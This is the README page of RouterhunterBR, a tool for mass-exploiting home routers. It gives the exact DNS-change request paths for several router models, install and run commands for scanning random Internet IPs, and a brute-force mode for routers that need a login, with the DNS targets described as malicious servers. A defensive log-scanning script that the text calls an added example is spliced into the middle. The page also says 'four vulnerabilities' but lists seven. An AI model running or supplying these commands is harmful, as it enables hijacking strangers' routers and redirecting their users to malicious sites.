RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. RouterhunterBR was designed to run over the Internet, looking through defined IP ranges or random addresses in order to automatically exploit the DNSChanger vulnerability on home routers.
DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware can change the DNS settings of a machine, redirecting the user to sites with malicious purposes. Imagine, for example, that your system is infected with this malware: a user trying to access a particular site (e.g. Facebook.com) may be forwarded to an unsolicited and potentially illegal website.
AUTHOR: Jhonathan Davi AKA jh00nbr
EMAIL: jhoonbr@protonmail.ch
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/jh00nbr
Facebook: https://fb.com/JhonVipNet
Fanpage: https://fb.com/InurlBrasil
Github: https://github.com/jh00nbr/
Youtube: https://www.youtube.com/c/Mrsinisterboy
- GETs:
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
- INSTALLATION:
git clone https://github.com/jh00nbr/Routerhunter-2.0.git
- COMMANDS:
--range 201.12.50.0-255
Sets the IP range that will be scanned
--bruteforce
Brute force with users and passwords on routers that require authentication, forcing the DNS change.
--startip / --endip
You can customize the IP range with a wildcard / Example: --startip 201.*.*.* --endip 201.*.*.*
--dns1 8.8.8.8 / --dns2 8.8.4.4
Primary and secondary malicious DNS servers, which will be listening for requests and will perform the redirection of pages
--threads 10
Sets the number of threads
--randomip
Randomizes the router IPs
--limitip 10
Sets the limit of random IPs
- Exploitation demonstrations:
Random IPs:
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --randomip --limitip 10 --threads 10
Scan an IP range:
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 192.168.25.0-255 --threads 10
Brute force with users and passwords on routers that require authentication:
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10
How to protect yourself
All router models covered by the scanner and shown during the lecture already have firmware patches that fix these issues. Default usernames and passwords should be changed!
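A defender-side check for the requests listed under GETs, as an added example that is not part of RouterhunterBR or the original page: it scans HTTP access logs for attempts to set router DNS servers through those endpoints. The Common Log Format layout, the sample lines and the approved-resolver list are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameter names taken from the GET list on this page.
DNS_CHANGE_PATHS = {"/dnscfg.cgi", "/dns_1", "/ddnsmngr.cmd"}
DNS_PARAMS = ("dnsPrimary", "dnsSecondary")

# Assumed layout: Common/Combined Log Format from a proxy or sensor
# placed in front of the router management interface.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def find_dns_change_requests(lines, approved_resolvers=()):
    """Return one finding per request that tries to set router DNS servers."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m["target"])
        if url.path not in DNS_CHANGE_PATHS:
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        servers = [query[p][0] for p in DNS_PARAMS if p in query]
        if not servers:
            continue  # endpoint hit without DNS parameters
        accepted = m["status"].startswith("2")
        unapproved = any(s not in approved_resolvers for s in servers)
        findings.append({
            "client": m["client"],
            "path": url.path,
            "servers": servers,
            "status": int(m["status"]),
            # A 2xx answer to an unapproved resolver means the change likely applied.
            "urgent": accepted and unapproved,
        })
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2015:10:00:01 +0000] "GET /dnscfg.cgi?dnsPrimary=192.0.2.53&dnsSecondary=192.0.2.54&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Mar/2015:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.7 - - [10/Mar/2015:10:00:03 +0000] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=192.0.2.53&dnsSecondary=192.0.2.54 HTTP/1.1" 401 0',
    '198.51.100.20 - - [10/Mar/2015:10:00:04 +0000] "GET /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsIfcsList=&dnsRefresh=1 HTTP/1.1" 200 256',
]
```

Findings marked urgent are the ones to act on first: compare the router's current DNS settings against the resolvers you expect and update the firmware.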
The script exploits four vulnerabilities in routers
- Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
http://www.exploit-db.com/exploits/35995/
- D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
http://www.exploit-db.com/exploits/35917/
- D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
http://1337day.com/exploit/23302/
- D-Link DSL-2780B DLink_1.01.14 – Unauthenticated Remote DNS Change
https://www.exploit-db.com/exploits/37237/
- D-Link DSL-2730B AU_2.01 – Authentication Bypass DNS Change
https://www.exploit-db.com/exploits/37240/
- D-Link DSL-526B ADSL2+ AU_2.01 – Unauthenticated Remote DNS Change
https://www.exploit-db.com/exploits/37241/
- DSLink 260E – Authenticated routers – DNS Changer – Bruteforce
https://www.youtube.com/watch?v=tNjy91g2Rak
http://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html